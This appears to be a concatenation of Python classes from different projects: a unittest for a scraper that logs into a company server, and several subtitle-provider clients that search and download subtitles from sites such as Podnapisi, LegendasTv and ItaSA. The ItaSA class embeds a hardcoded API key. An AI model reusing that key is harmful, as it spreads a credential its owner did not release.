class TestDownloader(TestCase): def setUp(self): """ Log into the remote server. """ self.url = 'http://bamboo-mec.de/ll.php5' test_dir = dirname(__file__) self.directory = join(test_dir, 'temp') credentials = {'username': '******', 'password': '******'} self.session = Session() headers = {'user-agent': 'Mozilla/5.0'} self.session.headers.update(headers) response = self.session.post(self.url, credentials) if response.ok: print('Now logged into remote server.') else: print('Failed to log in') exit(1) def tearDown(self): """ Logout. """ # Say goodbye to the server url = 'http://bamboo-mec.de/index.php5' payload = {'logout': '1'} response = self.session.get(url, params=payload) if response.history[0].status_code == 302: # We have been redirected to the home page print('Logged out from remote server. Goodbye!') self.session.close() # Clean up the temp directory for file in listdir(self.directory): if search(self.day.strftime('%Y-%m-%d'), file): remove(join(self.directory, file)) def testMiner(self): """ Check if the Miner class can download files correctly from the company server. """ m = Miner(self.session, self.directory, overwrite=True) random_day = randint(1, 28) random_month = randint(1, 12) self.day = date(2014, random_month, random_day) print('Testing file download for %s.' % str(self.day)) soups = m.mine(self.day) if not soups: # No jobs on that day... try again self.testMiner() else: for soup in soups: self.assertIsInstance(soup.data, BeautifulSoup) self.assertIsInstance(soup.stamp.date, date) self.assertIsInstance(soup.stamp.uuid, str) order_detail = soup.data.find(id='order_detail') self.assertIsNotNone(order_detail)
class SubtitulamosProvider(Provider): """Subtitulamos Provider.""" languages = {Language('por', 'BR')} | { Language(l) for l in ['cat', 'eng', 'glg', 'por', 'spa'] } video_types = (Episode, ) server_url = 'https://www.subtitulamos.tv/' search_url = server_url + 'search/query' def __init__(self): self.session = None def initialize(self): self.session = Session() self.session.headers[ 'User-Agent'] = 'Subliminal/%s' % __short_version__ # self.session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 ' \ # 'Firefox/56.0 ' def terminate(self): self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_url_titles(self, series, season, episode, year=None): """Search the URL titles by kind for the given `title`, `season` and `episode`. :param str series: series to search for. :param int season: season to search for. :param int episode: episode to search for. :param int year: year to search for. :return: the episode URL. :rtype: str """ # make the search logger.info('Searching episode url for %s, season %d, episode %d', series, season, episode) episode_url = None search = '{} {}x{}'.format(series, season, episode) r = self.session.get(self.search_url, headers={'Referer': self.server_url}, params={'q': search}, timeout=10) r.raise_for_status() if r.status_code != 200: logger.error('Error getting episode url') raise ProviderError('Error getting episode url') results = json.loads(r.text) for result in results: title = sanitize(result['name']) # attempt series with year if sanitize('{} ({})'.format(series, year)) in title: for episode_data in result['episodes']: if season == episode_data[ 'season'] and episode == episode_data['number']: episode_url = self.server_url + 'episodes/{}'.format( episode_data['id']) return episode_url # attempt series without year elif sanitize(series) in title: for episode_data in result['episodes']: if season == episode_data[ 'season'] and episode == episode_data['number']: episode_url = self.server_url + 'episodes/{}'.format( episode_data['id']) return episode_url return episode_url def query(self, series, season, episode, year=None): # get the episode url episode_url = self._search_url_titles(series, season, episode, year) if episode_url is None: logger.error('No episode url found for %s, season %d, episode %d', series, season, episode) return [] r = self.session.get(episode_url, headers={'Referer': self.server_url}, timeout=10) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # get episode title title_pattern = re.compile('{}(.+){}x{:02d}- (.+)'.format( series, season, episode).lower()) title = title_pattern.search( soup.select('#episode_title')[0].get_text().strip().lower()).group( 2) subtitles = [] for sub in soup.find_all('div', attrs={'id': 'progress_buttons_row'}): # read the language language = Language.fromsubtitulamos( sub.find_previous( 'div', class_='subtitle_language').get_text().strip()) hearing_impaired = False # modify spanish latino subtitle language to only spanish and set hearing_impaired = True # because if exists spanish and spanish latino subtitle for the same episode, the score will be # higher with spanish subtitle. Spanish subtitle takes priority. if language == Language('spa', 'MX'): language = Language('spa') hearing_impaired = True # read the release subtitle release = sub.find_next('div', class_='version_name').get_text().strip() # ignore incomplete subtitles status = sub.find_next('div', class_='subtitle_buttons').contents[1] if status.name != 'a': logger.debug('Ignoring subtitle in [%s] not finished', language) continue # read the subtitle url subtitle_url = self.server_url + status['href'][1:] subtitle = SubtitulamosSubtitle(language, hearing_impaired, episode_url, series, season, episode, title, year, release, subtitle_url) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): return [ s for s in self.query(video.series, video.season, video.episode, video.year) if s.language in languages ] def download_subtitle(self, subtitle): # download the subtitle logger.info('Downloading subtitle %s', subtitle.download_link) r = self.session.get(subtitle.download_link, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)
class PodnapisiProvider(Provider): languages = ({Language('por', 'BR'), Language('srp', script='Latn')} | {Language.fromalpha2(l) for l in language_converters['alpha2'].codes}) video_types = (Episode, Movie) server_url = 'http://podnapisi.net/subtitles/' def initialize(self): self.session = Session() self.session.headers = {'User-Agent': 'Subliminal/%s' % get_version(__version__)} def terminate(self): self.session.close() def query(self, language, keyword, season=None, episode=None, year=None): # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652 params = {'sXML': 1, 'sL': str(language), 'sK': keyword} is_episode = False if season and episode: is_episode = True params['sTS'] = season params['sTE'] = episode if year: params['sY'] = year # loop over paginated results logger.info('Searching subtitles %r', params) subtitles = [] pids = set() while True: # query the server xml = etree.fromstring(self.session.get(self.server_url + 'search/old', params=params, timeout=10).content) # exit if no results if not int(xml.find('pagination/results').text): logger.debug('No subtitles found') break # loop over subtitles for subtitle_xml in xml.findall('subtitle'): # read xml elements language = Language.fromietf(subtitle_xml.find('language').text) hearing_impaired = 'n' in (subtitle_xml.find('flags').text or '') page_link = subtitle_xml.find('url').text pid = subtitle_xml.find('pid').text releases = [] if subtitle_xml.find('release').text: for release in subtitle_xml.find('release').text.split(): releases.append(re.sub(r'\.+$', '', release)) # remove trailing dots title = subtitle_xml.find('title').text season = int(subtitle_xml.find('tvSeason').text) episode = int(subtitle_xml.find('tvEpisode').text) year = int(subtitle_xml.find('year').text) if is_episode: subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title, season=season, episode=episode, year=year) else: subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title, year=year) # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321 if pid in pids: continue logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) pids.add(pid) # stop on last page if int(xml.find('pagination/current').text) >= int(xml.find('pagination/count').text): break # increment current page params['page'] = int(xml.find('pagination/current').text) + 1 logger.debug('Getting page %d', params['page']) return subtitles def list_subtitles(self, video, languages): if isinstance(video, Episode): return [s for l in languages for s in self.query(l, video.series, season=video.season, episode=video.episode, year=video.year)] elif isinstance(video, Movie): return [s for l in languages for s in self.query(l, video.title, year=video.year)] def download_subtitle(self, subtitle): # download as a zip logger.info('Downloading subtitle %r') r = self.session.get(self.server_url + subtitle.pid + '/download', params={'container': 'zip'}, timeout=10) r.raise_for_status() # open the zip with ZipFile(io.BytesIO(r.content)) as zf: if len(zf.namelist()) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class BetaSeriesProvider(Provider): """BetaSeries Provider""" languages = {Language(l) for l in ['fra', 'eng']} def __init__(self, token=None): if not token: raise ConfigurationError('Token must be specified') self.token = token def initialize(self): self.session = Session() self.session.headers = { 'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2") } def terminate(self): self.session.close() def query(self, languages, video): # query the server if isinstance(video, Movie): logger.error( 'It\'s not possible to search for a movie subtitle on BetaSeries' ) return [] elif isinstance(video, Episode): result = None if video.tvdb_id: params = { 'key': self.token, 'thetvdb_id': video.tvdb_id, 'v': 3.0, 'subtitles': 1 } logger.debug('Searching subtitles %r', params) res = self.session.get(server_url + 'episodes/display', params=params, timeout=10) res.raise_for_status() result = res.json() elif video.series_tvdb_id: params = { 'key': self.token, 'thetvdb_id': video.series_tvdb_id, 'season': video.season, 'episode': video.episode, 'subtitles': 1, 'v': 3.0 } logger.debug('Searching subtitles %r', params) res = self.session.get(server_url + 'shows/episodes', params=params, timeout=10) res.raise_for_status() result = res.json() if result['errors'] != []: logger.debug('Status error: %r', result['errors']) return [] # parse the subtitles subtitles = [] if 'episode' in result: subs = result['episode']['subtitles'] elif 'episodes' in result: subs = result['episodes'][0]['subtitles'] else: return [] for sub in subs: language = _translateLanguageCodeToLanguage(sub['language']) if language in languages: # Filter seriessub source because it shut down so the links are all 404 if sub['source'] != 'seriessub': subtitles.append( BetaSeriesSubtitle(sub['id'], language, sub['file'], sub['url'])) return subtitles def list_subtitles(self, video, languages): return self.query(languages, video) def download_subtitle(self, subtitle): logger.info('Downloading subtitle %r', subtitle) r = self.session.get(subtitle.download_link, timeout=10) r.raise_for_status() archive = _get_archive(r.content) subtitle_content = _get_subtitle_from_archive( archive) if archive else r.content if subtitle_content: subtitle.content = fix_line_ending(subtitle_content) else: logger.debug('Could not extract subtitle from %r', archive)
class LegendasTvProvider(Provider): languages = {Language.fromlegendastv(l) for l in language_converters['legendastv'].codes} video_types = (Episode, Movie) server_url = 'http://legendas.tv' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False def initialize(self): self.session = Session() # login if self.username is not None and self.password is not None: logger.info('Logging in') data = {'_method': 'POST', 'data[User][username]': self.username, 'data[User][password]': self.password} r = self.session.post('%s/login' % self.server_url, data, allow_redirects=False, timeout=TIMEOUT) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) auth_error = soup.find('div', {'class': 'alert-error'}, text=re.compile(u'.*Usuário ou senha inválidos.*')) if auth_error: raise AuthenticationError(self.username) logger.debug('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get('%s/users/logout' % self.server_url, timeout=TIMEOUT) r.raise_for_status() logger.debug('Logged out') self.logged_in = False self.session.close() def matches(self, actual_properties, expected_title, expected_season=None, expected_episode=None, expected_year=None, ignore_episode=False): """ Matches the `actual_properties` against the expected parameters. The `actual_properties` keys follow the guessit properties names. For movies: - `type` should match - `title` should match - `year` should match, unless they're not defined and expected and actual `title`s are equal For episodes: - `type` should match - `series` should match - `season` should match - `episode` should match, unless `ignore_episode` is True :param dict actual_properties: dictionary that contains the actual values following guessit property names. :param str expected_title: the expected movie/series title. :param int expected_season: the expected series season number. :param int expected_episode: the expected series episode number. :param int expected_year: the expected movie/series year. :param bool ignore_episode: `True` if episode matching should be ignored. Default: `False`. :return: Whether actual matches expected. :rtype: bool """ expected_type = 'episode' if expected_season else 'movie' if expected_type != actual_properties.get('type'): return False s_actual_title = sanitize(actual_properties.get('title')) s_expected_title = sanitize(expected_title) if not s_actual_title or not s_expected_title or s_expected_title not in s_actual_title: return False if expected_type == 'movie': if expected_year != actual_properties.get('year'): if expected_year and actual_properties.get('year'): return False if s_expected_title != s_actual_title: return False elif expected_type == 'episode': if expected_season != actual_properties.get('season'): return False if not ignore_episode and expected_episode != actual_properties.get('episode'): return False return True @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def search_candidates(self, title, season, episode, year): """ Returns candidates for shows or movies by querying `/legenda/sugestao` page. Since the result is a list of candidates (movies, series, etc) an additional filtering is required. The properties type, name, year and season are used to filter out bad suggestions. :param str title: the movie/series title. :param int season: the series season number. :param int episode: the series episode number. :param int year: the movie/series year. :return: the candidates for shows or movies. :rtype: list of dict """ results = dict() for keyword in {sanitize(title), title.lower().replace(':', '')}: logger.info('Searching candidates using the keyword %s', keyword) r = self.session.get('%s/legenda/sugestao/%s' % (self.server_url, keyword), timeout=TIMEOUT) r.raise_for_status() results.update({item['_id']: item for item in json.loads(r.text)}) # get the shows/movies out of the suggestions. # json sample: # [ # { # "_index": "filmes", # "_type": "filme", # "_id": "24551", # "_score": null, # "_source": { # "id_filme": "24551", # "id_imdb": "903747", # "tipo": "S", # "int_genero": "1036", # "dsc_imagen": "tt903747.jpg", # "dsc_nome": "Breaking Bad", # "dsc_sinopse": "Dos mesmos criadores de Arquivo X, mas n\u00e3o tem nada de sobrenatural nesta # s\u00e9rie. A express\u00e3o \"breaking bad\" \u00e9 usada quando uma coisa que # j\u00e1 estava ruim, fica ainda pior. E \u00e9 exatamente isso que acontece com # Walter White, um professor de qu\u00edmica, que vivia sua vida \"tranquilamente\" # quando, boom, um diagn\u00f3stico terminal muda tudo. O liberta. Ele come\u00e7a a # usar suas habilidades em qu\u00edmica de outra forma: montando um laborat\u00f3rio # de drogas para financiar o futuro de sua fam\u00edlia.", # "dsc_data_lancamento": "2011", # "dsc_url_imdb": "http:\/\/www.imdb.com\/title\/tt0903747\/", # "dsc_nome_br": "Breaking Bad - 4\u00aa Temporada", # "soundex": null, # "temporada": "4", # "id_usuario": "241436", # "flg_liberado": "0", # "dsc_data_liberacao": null, # "dsc_data": "2011-06-12T21:06:42", # "dsc_metaphone_us": "BRKNKBT0SSN", # "dsc_metaphone_br": "BRKNKBTTMPRT", # "episodios": null, # "flg_seriado": null, # "last_used": "1372569074", # "deleted": false # }, # "sort": [ # "4" # ] # } # ] # # Notes: # tipo: Defines if the entry is a movie or a tv show (or a collection??) # imdb_id: Sometimes it appears as a number and sometimes as a string prefixed with tt # temporada: Sometimes is ``null`` and season information should be extracted from dsc_nome_br # type, title, series, season, year: should follow guessit properties names mapping = dict( id='id_filme', type='tipo', title='dsc_nome', series='dsc_nome', season='temporada', year='dsc_data_lancamento', title_br='dsc_nome_br', imdb_id='id_imdb' ) # movie, episode: should follow guessit type values type_map = { 'M': 'movie', 'S': 'episode', 'C': 'episode' # Considering C as episode. Probably C stands for Collections } # Regex to extract the season number. e.g.: 3\u00aa Temporada, 1a Temporada, 2nd Season season_re = re.compile('.*? - (\d{1,2}).*?((emporada)|(season))', re.IGNORECASE) # Regex to extract the IMDB id. e.g.: tt02342 imdb_re = re.compile('t{0,2}(\d+)') candidates = [] for result in results.values(): entry = result['_source'] item = {k: entry.get(v) for k, v in mapping.items()} item['type'] = type_map.get(item.get('type'), 'movie') imdb_match = imdb_re.search(item.get('imdb_id')) item['imdb_id'] = imdb_match.group(1) if imdb_match else None # Season information might be missing and it should be extracted from 'title_br' if not item.get('season') and item.get('title_br'): season_match = season_re.search(item.get('title_br')) item['season'] = season_match.group(1) if season_match else None # Some string fields are actually integers for field in ['season', 'year', 'imdb_id']: field_text = item.get(field) item[field] = int(field_text) if field_text and field_text.isdigit() else None # ignoring episode match since this first step is only about movie/season information if self.matches(item, title, expected_season=season, expected_episode=episode, expected_year=year, ignore_episode=True): candidates.append(dict(item)) logger.debug('Candidates found: %s', candidates) return candidates def query(self, language, title, season=None, episode=None, year=None): """ Returns a list of subtitles based on the input parameters. - 1st step: initial lookup for the movie/show information (see `search_candidates`) - 2nd step: list all candidates to movies/shows from previous step - 3rd step: reject candidates that doesn't match the input parameters (wrong season, wrong episode, etc...) - 4th step: download all subtitles to inspect the 'release name' - 5th step: creates a subtitle for each release :param language: the requested language :param str title: the movie/series title :param int season: the series season number :param int episode: the series episode number :param int year: the movie/series year :return: a list of subtitles that matches the query parameters :rtype: `list` of :class:`~subliminal.providers.LegendasTvSubtitle` """ candidates = self.search_candidates(title, season, episode, year) # The language code used by legendas.tv language_code = language.legendastv # Regex to extract rating information (number of downloads and rate). e.g.: 12345 downloads, nota 10 rating_info_re = re.compile('(\d*) downloads, nota (\d{0,2})') # Regex to extract the last update timestamp. e.g.: 25/12/2014 - 19:25 timestamp_info_re = re.compile('(\d{1,2}/\d{1,2}/\d{2,4} \- \d{1,2}:\d{1,2})') # Regex to identify the 'pack' suffix that candidates might have. e.g.: (p)Breaking.Bad.S05.HDTV.x264 pack_name_re = re.compile('^\(p\)') # Regex to extract the subtitle_id from the 'href'. e.g.: /download/560014472eb4d/foo/bar subtitle_href_re = re.compile('/download/(\w+)/.+') subtitles = [] # loop over matched movies/shows for candidate in candidates: # page_url: {server_url}/util/carrega_legendas_busca_filme/{title_id}/{language_code} candidate_id = candidate.get('id') page_url = '%s/util/carrega_legendas_busca_filme/%s/%d' % (self.server_url, candidate_id, language_code) # loop over paginated results while page_url: # query the server r = self.session.get(page_url, timeout=TIMEOUT) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) div_tags = soup.find_all('div', {'class': 'f_left'}) # loop over each div which contains information about a single subtitle for div in div_tags: a_tag = div.p.a a_tag_text = a_tag.string if isinstance(a_tag.string, str) else a_tag.string.encode('utf-8') # Removing forward-slashes from the candidate name (common practice in legendas.tv), since it # misleads guessit to identify the candidate name as a file in a specific folder (which is wrong). candidate_name = pack_name_re.sub('', a_tag_text).replace('/', '.') page_link = a_tag['href'] subtitle_href_match = subtitle_href_re.search(page_link) subtitle_id = subtitle_href_match.group(1) if subtitle_href_match else None multiple_episodes = bool(div.find_parent('div', {'class': 'pack'}) or pack_name_re.findall(a_tag_text)) featured = bool(div.find_parent('div', {'class': 'destaque'})) rating_info_match = rating_info_re.search(div.text) no_downloads_text = rating_info_match.group(1) if rating_info_match else None no_downloads = int(no_downloads_text) if no_downloads_text and no_downloads_text.isdigit() else None rating_text = rating_info_match.group(2) if rating_info_match else None rating = int(rating_text) if rating_text and rating_text.isdigit() else None timestamp_info_match = timestamp_info_re.search(div.text) timestamp_text = timestamp_info_match.group(1) if timestamp_info_match else None timestamp = datetime.strptime(timestamp_text, '%d/%m/%Y - %H:%M') if timestamp_text else None # Using the candidate name to filter out bad candidates # (wrong type, wrong episode, wrong season or even wrong title) guess = guessit(candidate_name, {'type': candidate.get('type')}) if not self.matches(guess, expected_title=title, expected_season=season, expected_episode=episode, expected_year=year, ignore_episode=multiple_episodes): continue # Unfortunately, the only possible way to know the release names of a specific candidate is to # download the compressed file (rar/zip) and list the file names. handler = LegendasTvArchiveHandler(self) subtitle_names = handler.get_subtitle_names(subtitle_id, timestamp) if not subtitle_names: continue for name in subtitle_names: # Filtering out bad candidates (one archive might contain subtitles for the whole season, # therefore this filtering is necessary) guess = guessit(os.path.splitext(name)[0], {'type': candidate.get('type')}) if not self.matches(guess, expected_title=title, expected_season=season, expected_episode=episode, expected_year=year): continue subtitle = LegendasTvSubtitle(language, page_link, subtitle_id, name, handler.binary_content, imdb_id=candidate.get('imdb_id'), type=candidate.get('type'), season=candidate.get('season'), year=candidate.get('year'), no_downloads=no_downloads, rating=rating, featured=featured, multiple_episodes=multiple_episodes, timestamp=timestamp) logger.debug('Found subtitle %s', subtitle) subtitles.append(subtitle) next_page_link = soup.find('a', attrs={'class': 'load_more'}, text='carregar mais') page_url = self.server_url + next_page_link['href'] if next_page_link else None # High quality subtitles should have higher precedence when their scores are equal. subtitles.sort(key=lambda s: (s.featured, s.no_downloads, s.rating, s.multiple_episodes), reverse=True) return subtitles def list_subtitles(self, video, languages): """ Returns a list of subtitles for the defined video and requested languages :param video: :param languages: the requested languages :return: a list of subtitles for the requested video and languages :rtype : `list` of :class:`~subliminal.providers.LegendasTvSubtitle` """ season = episode = None if isinstance(video, Episode): title = video.series season = video.season episode = video.episode else: title = video.title year = video.year return [s for l in languages for s in self.query(l, title, season=season, episode=episode, year=year)] def get_subtitle_names(self, content): """ Returns all subtitle names for the given rar/zip binary content. :param content: the downloaded binary content (rar/zip) :return: list of subtitle names :rtype: `list` of `string` """ return self._uncompress( content, lambda cf: [f for f in cf.namelist() if 'legendas.tv' not in f.lower() and f.lower().endswith(SUBTITLE_EXTENSIONS)]) def extract_subtitle(self, content, subtitle_name): """ Extract the subtitle content from the compressed file. The file is downloaded, the subtitle_name is uncompressed and its contents is returned. :param content: the downloaded binary content (rar/zip) :param str subtitle_name: the filename to be extracted :return: the subtitle content :rtype : `string` """ return self._uncompress(content, lambda cf, name: fix_line_ending(cf.read(name)), subtitle_name) def _uncompress(self, content, function, *args, **kwargs): bc = io.BytesIO(content) cf = RarFile(bc) if is_rarfile(bc) else (ZipFile(bc) if is_zipfile(bc) else None) return function(cf, *args, **kwargs) if cf else None def download_content(self, subtitle_id, timestamp): """ Downloads the compressed file for the specified subtitle_id. The timestamp is required in order to avoid the cache when the compressed file is updated (it's a common practice in legendas.tv to update the archive with new subtitles) :param str subtitle_id: the id used to download the compressed file :param str timestamp: represents the last update timestamp of the file :return: the downloaded file :rtype : `bytearray` """ logger.debug('Downloading subtitle_id %s. Last update on %s', subtitle_id, timestamp) r = self.session.get('%s/downloadarquivo/%s' % (self.server_url, subtitle_id), timeout=TIMEOUT) r.raise_for_status() return r.content def download_subtitle(self, subtitle): bc = subtitle.binary_content if subtitle.binary_content else \ self.download_content(subtitle.subtitle_id, subtitle.timestamp) subtitle.content = self.extract_subtitle(bc, subtitle.name)
class ItaSAProvider(Provider): languages = {Language('ita')} video_types = (Episode, ) server_url = 'https://api.italiansubs.net/api/rest/' apikey = 'd86ad6ec041b334fac1e512174ee04d5' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False self.login_itasa = False self.session = None self.auth_code = None def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/%s' % __version__ # login if self.username is not None and self.password is not None: logger.info('Logging in') params = { 'username': self.username, 'password': self.password, 'apikey': self.apikey } r = self.session.get(self.server_url + 'users/login', params=params, allow_redirects=False, timeout=10) root = etree.fromstring(r.content) if root.find('status').text == 'fail': raise AuthenticationError(root.find('error/message').text) self.auth_code = root.find('data/user/authcode').text data = { 'username': self.username, 'passwd': self.password, 'remember': 'yes', 'option': 'com_user', 'task': 'login', 'silent': 'true' } r = self.session.post('http://www.italiansubs.net/index.php', data=data, allow_redirects=False, timeout=30) r.raise_for_status() self.logged_in = True def terminate(self): self.session.close() self.logged_in = False @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows` page. :return: show id per series, lower case and without quotes. :rtype: dict """ # get the show page logger.info('Getting show ids') params = {'apikey': self.apikey} r = self.session.get(self.server_url + 'shows', timeout=10, params=params) r.raise_for_status() root = etree.fromstring(r.content) # populate the show ids show_ids = {} for show in root.findall('data/shows/show'): if show.find('name').text is None: # pragma: no cover continue show_ids[sanitize(show.find('name').text).lower()] = int( show.find('id').text) logger.debug('Found %d show ids', len(show_ids)) return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series): """Search the show id from the `series` :param str series: series of the episode. :return: the show id, if found. :rtype: int or None """ # build the param params = {'apikey': self.apikey, 'q': series} # make the search logger.info('Searching show ids with %r', params) r = self.session.get(self.server_url + 'shows/search', params=params, timeout=10) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Show id not found: no suggestion') return None # Looking for show in first page for show in root.findall('data/shows/show'): if sanitize(show.find('name').text).lower() == sanitize( series.lower()): show_id = int(show.find('id').text) logger.debug('Found show id %d', show_id) return show_id # Not in the first page of result try next (if any) next_page = root.find('data/next') while next_page.text is not None: # pragma: no cover r = self.session.get(next_page.text, timeout=10) r.raise_for_status() root = etree.fromstring(r.content) logger.info('Loading suggestion page %r', root.find('data/page').text) # Looking for show in following pages for show in root.findall('data/shows/show'): if sanitize(show.find('name').text).lower() == sanitize( series.lower()): show_id = int(show.find('id').text) logger.debug('Found show id %d', show_id) return show_id next_page = root.find('data/next') # No matches found logger.warning('Show id not found: suggestions does not match') return None def get_show_id(self, series, country_code=None): """Get the best matching show id for `series`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id` :param str series: series of the episode. :param str country_code: the country in which teh show is aired. :return: the show id, if found. :rtype: int or None """ series_sanitized = sanitize(series).lower() show_ids = self._get_show_ids() show_id = None # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower())) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) # search as last resort if not show_id: logger.warning('Series not found in show ids') show_id = self._search_show_id(series) return show_id @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME) def _download_zip(self, sub_id): # download the subtitle logger.info('Downloading subtitle %r', sub_id) params = { 'authcode': self.auth_code, 'apikey': self.apikey, 'subtitle_id': sub_id } r = self.session.get(self.server_url + 'subtitles/download', params=params, timeout=30) r.raise_for_status() return r.content def _get_season_subtitles(self, show_id, season, sub_format): params = { 'apikey': self.apikey, 'show_id': show_id, 'q': 'Stagione %%%d' % season, 'version': sub_format } r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning( 'Subtitles for season not found, try with rip suffix') params['version'] = sub_format + 'rip' r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles for season not found') return [] subs = [] # Looking for subtitles in first page season_re = re.compile('.*?stagione 0*?%d.*' % season) for subtitle in root.findall('data/subtitles/subtitle'): if season_re.match(subtitle.find('name').text.lower()): logger.debug('Found season zip id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) content = self._download_zip(int(subtitle.find('id').text)) if not is_zipfile(io.BytesIO(content)): # pragma: no cover if 'limite di download' in content: raise TooManyRequests() else: raise ConfigurationError('Not a zip file: %r' % content) with ZipFile(io.BytesIO(content)) as zf: episode_re = re.compile('s(\d{1,2})e(\d{1,2})') for index, name in enumerate(zf.namelist()): match = episode_re.search(name) if not match: # pragma: no cover logger.debug('Cannot decode subtitle %r', name) else: sub = ItaSASubtitle( int(subtitle.find('id').text), subtitle.find('show_name').text, int(match.group(1)), int(match.group(2)), None, None, None, name) sub.content = fix_line_ending(zf.read(name)) subs.append(sub) return subs def query(self, series, season, episode, video_format, resolution, country=None): # To make queries you need to be logged in if not self.logged_in: # pragma: no cover raise ConfigurationError('Cannot query if not logged in') # get the show id show_id = self.get_show_id(series, country) if show_id is None: logger.error('No show id found for %r ', series) return [] # get the page of the season of the show logger.info( 'Getting the subtitle of show id %d, season %d episode %d, format %r', show_id, season, episode, video_format) subtitles = [] # Default format is SDTV if not video_format or video_format.lower() == 'hdtv': if resolution in ('1080i', '1080p', '720p'): sub_format = resolution else: sub_format = 'normale' else: sub_format = video_format.lower() # Look for year params = {'apikey': self.apikey} r = self.session.get(self.server_url + 'shows/' + str(show_id), params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) year = root.find('data/show/started').text if year: year = int(year.split('-', 1)[0]) tvdb_id = root.find('data/show/id_tvdb').text if tvdb_id: tvdb_id = int(tvdb_id) params = { 'apikey': self.apikey, 'show_id': show_id, 'q': '%dx%02d' % (season, episode), 'version': sub_format } r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles not found, try with rip suffix') params['version'] = sub_format + 'rip' r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles not found, go season mode') # If no subtitle are found for single episode try to download all season zip subs = self._get_season_subtitles(show_id, season, sub_format) if subs: for subtitle in subs: subtitle.format = video_format subtitle.year = year subtitle.tvdb_id = tvdb_id return subs else: return [] # Looking for subtitles in first page for subtitle in root.findall('data/subtitles/subtitle'): if '%dx%02d' % (season, episode) in subtitle.find('name').text.lower(): logger.debug('Found subtitle id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) sub = ItaSASubtitle(int(subtitle.find('id').text), subtitle.find('show_name').text, season, episode, video_format, year, tvdb_id, subtitle.find('name').text) subtitles.append(sub) # Not in the first page of result try next (if any) next_page = root.find('data/next') while next_page.text is not None: # pragma: no cover r = self.session.get(next_page.text, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) logger.info('Loading subtitles page %r', root.data.page.text) # Looking for show in following pages for subtitle in root.findall('data/subtitles/subtitle'): if '%dx%02d' % (season, episode) in subtitle.find('name').text.lower(): logger.debug('Found subtitle id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) sub = ItaSASubtitle(int(subtitle.find('id').text), subtitle.find('show_name').text, season, episode, video_format, year, tvdb_id, subtitle.find('name').text) subtitles.append(sub) next_page = root.find('data/next') # Download the subs found, can be more than one in zip additional_subs = [] for sub in subtitles: # open the zip content = self._download_zip(sub.sub_id) if not is_zipfile(io.BytesIO(content)): # pragma: no cover if 'limite di download' in content: raise TooManyRequests() else: raise ConfigurationError('Not a zip file: %r' % content) with ZipFile(io.BytesIO(content)) as zf: if len(zf.namelist()) > 1: # pragma: no cover for index, name in enumerate(zf.namelist()): if index == 0: # First element sub.content = fix_line_ending(zf.read(name)) sub.full_data = name else: add_sub = copy.deepcopy(sub) add_sub.content = fix_line_ending(zf.read(name)) add_sub.full_data = name additional_subs.append(add_sub) else: sub.content = fix_line_ending(zf.read(zf.namelist()[0])) sub.full_data = zf.namelist()[0] return subtitles + additional_subs def list_subtitles(self, video, languages): return self.query(video.series, video.season, video.episode, video.format, video.resolution) def download_subtitle(self, subtitle): # pragma: no cover pass
